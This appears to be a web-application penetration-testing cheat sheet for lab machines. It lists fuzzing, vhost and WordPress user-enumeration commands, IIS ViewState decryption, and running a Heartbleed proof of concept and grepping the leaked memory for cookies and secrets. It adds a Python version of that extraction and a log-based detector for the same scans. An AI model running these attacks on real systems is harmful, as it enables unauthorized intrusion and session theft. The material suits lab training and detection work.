Web Server

Misc.

Online Decoder

Fingerprint

Port 443
openssl s_client -connect <hostname>:443

Port 80
telnet <IP> 80

Dictionary-Brute Force

Wfuzz

#ffuf
ffuf -u http://192.168.194.22/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -e .php

#Wfuzz
wfuzz -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1mil-5000.txt --hl 0 http://FUZZ.bart.htb

#Gobuster
gobuster dir --wordlist  directory-list-2.3-medium.txt -u https://<IP> -x php,html,conf,txt -k -r

#Dirsearch [Faster, but not accurate]
python3 dirsearch.py -u http://url.com/ -e php -x 403,404

#Custom dictionary file using the information found on the forum.bart.htb page
cewl forum.bart.htb -w bart-dic.txt
tr '[:upper:]' '[:lower:]' < bart-dic.txt > bart-dic-lower.txt

wfuzz -c -w fsoc.dic --hs Invalid -d "log=FUZZ&pwd=aaaaa" http://url/page.php

#When using multiple/same wordlists for both params:
wfuzz -c -z file,/fsoc.dic -z file,/root/Documents/MrRobot/fsoc.dic -d "log=FUZZ&pwd=FUZ2Z"
  • --hs Invalid : hide every response whose body matches the regex "Invalid"; h stands for hide and s selects the regex (string) filter, as opposed to --hh (length) or --hw (word count).

Leaked Machine Keys

IIS

    AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate  --modifier=CA0B0334 --macdecode -f out.txt

Heartbleed

Reference

Exploitation

Exploit: https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py

nmap --script vuln -oA vuln-scan 10.10.10.79
nmap -sV --script=ssl-heartbleed
#sslscan may not be accurate
sslscan <ip>

#Python 2.7.x
python heartbleed-poc.py 10.10.10.79 -n 10 -q 

#Grep juice
#Interesting Key Value Pairs
pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump.bin
awk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin
grep -a "^Cookie:" dump.bin
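The three "grep juice" one-liners above (pcregrep for key=value pairs, the awk range from a request line through the Connection header, and grep for Cookie headers) as a single Python script. This is an added example, not code from the original page; the dump it runs over is a constructed byte string, not output from any real host, and it reproduces the same three patterns so the extraction can be checked offline on binary input.

```python
import re

# Constructed sample of a leaked-memory dump: binary noise interleaved with
# fragments of HTTP requests. Fabricated test data, not from any real host.
SAMPLE_DUMP = (
    b"\x00\x17\x03\x02\x00\x03\x01\x40\x00"
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Cookie: PHPSESSID=abc123def456; remember=1\r\n"
    b"Connection: keep-alive\r\n"
    b"\xff\xfe\x00\x00garbage\x01\x02"
    b"user=alice&pass=s3cret\x00\x00"
    b"GET /index.html HTTP/1.1\r\n"
    b"Connection: close\r\n"
    b"token=9f8e7d6c\x00"
)

# Same patterns as the pcregrep / awk / grep one-liners, compiled for bytes so
# they work on binary input (the -a flag in grep/pcregrep does the same job).
KV_RE = re.compile(rb"[A-Za-z0-9_-]+=[0-9a-zA-Z]+")
REQUEST_START_RE = re.compile(rb"[HPG][UEO][AST][DT ]")   # GET / POST / PUT / HEAD
REQUEST_END_RE = re.compile(rb"Connection")
COOKIE_PREFIX = b"Cookie:"


def key_value_pairs(dump: bytes) -> list:
    """pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump.bin"""
    return [m.decode("ascii") for m in KV_RE.findall(dump)]


def request_blocks(dump: bytes) -> list:
    """awk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin

    awk's range pattern prints from a line matching the first regex through the
    next line matching the second, inclusive; a range still open at end of
    input is printed as well. Lines are decoded as latin-1 so binary noise
    survives instead of raising a decode error.
    """
    blocks = []
    current = None
    for raw in dump.splitlines():
        line = raw.decode("latin-1")
        if current is None and REQUEST_START_RE.search(raw):
            current = []
        if current is not None:
            current.append(line)
            if REQUEST_END_RE.search(raw):
                blocks.append(current)
                current = None
    if current:
        blocks.append(current)
    return blocks


def cookie_headers(dump: bytes) -> list:
    """grep -a "^Cookie:" dump.bin"""
    return [raw.decode("latin-1") for raw in dump.splitlines()
            if raw.startswith(COOKIE_PREFIX)]


if __name__ == "__main__":
    print("key=value pairs:", key_value_pairs(SAMPLE_DUMP))
    for block in request_blocks(SAMPLE_DUMP):
        print("request block:", block)
    print("cookies:", cookie_headers(SAMPLE_DUMP))
```

The awk range semantics matter: a line that happens to contain `GET ` in the middle of binary garbage still opens a block, exactly as awk would treat it, so expect noisy first lines in real dumps.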

Vhost Brute Force [ Sub-domain Enum]

wfuzz

  • Run wfuzz and fuzz the Host HTTP header.

  • With wfuzz, I’ll always start it without the hiding flag, see what the default response looks like, and then Ctrl-c to kill it, and re-run with a flag to hide the default response.

  • For the HTTP site --hh 178 worked (--hh hides responses by character length), and --hh 49 on the HTTPS site.

wfuzz -c -u http://10.10.10.43/ -H "Host: FUZZ.nineveh.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 178

CMS

Wordpress

  • wpscan registered email: noreply@yamaarr.com

  • -u : Enumerate users

wpscan -e vp --plugins-detection aggressive --api-token <API> --url <URL> --disable-tls-checks

#User enum
wfuzz -c -u http://<IP>/wp-login.php -z file,/opt/SecLists/Usernames/Names/names.txt -d "log=FUZZ&pwd=pass&wp-submit=Log+In&redirect_to=http%3A%2F%2Ffunbox.fritz.box%2Fwp-admin%2F&testcookie=1" --hw 308
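Seen from the server side, the three enumeration techniques on this page (directory/file wordlists, Host-header vhost guessing, and username probing against wp-login.php) each leave a distinctive trace in the access log: a burst of 404s from one client, many distinct Host values from one client, and many POSTs to the login form from one client. The following detection script is an added example, not part of the original page or of wfuzz; the log lines are constructed, the log format (vhost prepended to the Apache combined format) and the thresholds are assumptions for the sample.

```python
import re
from collections import Counter, defaultdict

# Assumed log format (hypothetical): Apache combined log with the served vhost
# prepended, i.e. LogFormat "%v %h %l %u %t \"%r\" %>s %b" in Apache terms.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)$'
)

# Constructed sample log; hostnames, addresses and timestamps are made up.
SAMPLE_LOG = [
    # one ordinary visitor
    'www.example.test 10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 5120',
    'www.example.test 10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /about HTTP/1.1" 200 2048',
]
# directory fuzzing from 10.0.0.9: a burst of 404s for wordlist-style paths
SAMPLE_LOG += [
    f'www.example.test 10.0.0.9 - - [01/Jan/2024:10:01:{i:02d} +0000] "GET /{p} HTTP/1.1" 404 196'
    for i, p in enumerate(["admin", "backup", "old", "test.php", "dev", "tmp"])
]
# vhost guessing from 10.0.0.7: one client, many different Host headers
SAMPLE_LOG += [
    f'{h}.example.test 10.0.0.7 - - [01/Jan/2024:10:02:{i:02d} +0000] "GET / HTTP/1.1" 200 178'
    for i, h in enumerate(["dev", "staging", "mail", "vpn"])
]
# username probing against the login form from 10.0.0.11
SAMPLE_LOG += [
    f'www.example.test 10.0.0.11 - - [01/Jan/2024:10:03:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3090'
    for i in range(5)
]

# Thresholds are assumptions chosen for this small sample; tune them against a
# real baseline and evaluate them per time window rather than per whole file.
THRESHOLDS = {"not_found": 5, "vhosts": 3, "wp_login_posts": 4}


def parse(line):
    """Return the log fields as a dict, or None for a line that does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines, thresholds=THRESHOLDS):
    """Return sorted (client, rule, count) findings for the three patterns."""
    not_found = Counter()        # 404s per client: directory/file wordlists
    vhosts = defaultdict(set)    # distinct Host values per client: vhost guessing
    wp_posts = Counter()         # POSTs to wp-login.php per client: username probing
    for rec in filter(None, map(parse, lines)):
        client = rec["client"]
        if rec["status"] == "404":
            not_found[client] += 1
        vhosts[client].add(rec["vhost"])
        if rec["method"] == "POST" and rec["path"].split("?")[0] == "/wp-login.php":
            wp_posts[client] += 1

    findings = []
    findings += [(c, "directory-fuzzing", n) for c, n in not_found.items()
                 if n >= thresholds["not_found"]]
    findings += [(c, "vhost-enumeration", len(s)) for c, s in vhosts.items()
                 if len(s) >= thresholds["vhosts"]]
    findings += [(c, "wp-login-user-enum", n) for c, n in wp_posts.items()
                 if n >= thresholds["wp_login_posts"]]
    return sorted(findings)


if __name__ == "__main__":
    for client, rule, count in detect(SAMPLE_LOG):
        print(f"{client:12} {rule:22} {count}")
```

The vhost rule keys on the `%v` field because unknown Host values usually fall through to the default vhost with an ordinary status code, so a status-based rule would miss them; likewise the login rule counts POSTs rather than failures, because the `--hw 308` filter in the command above exploits the fact that success and failure differ only in response size, not status.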
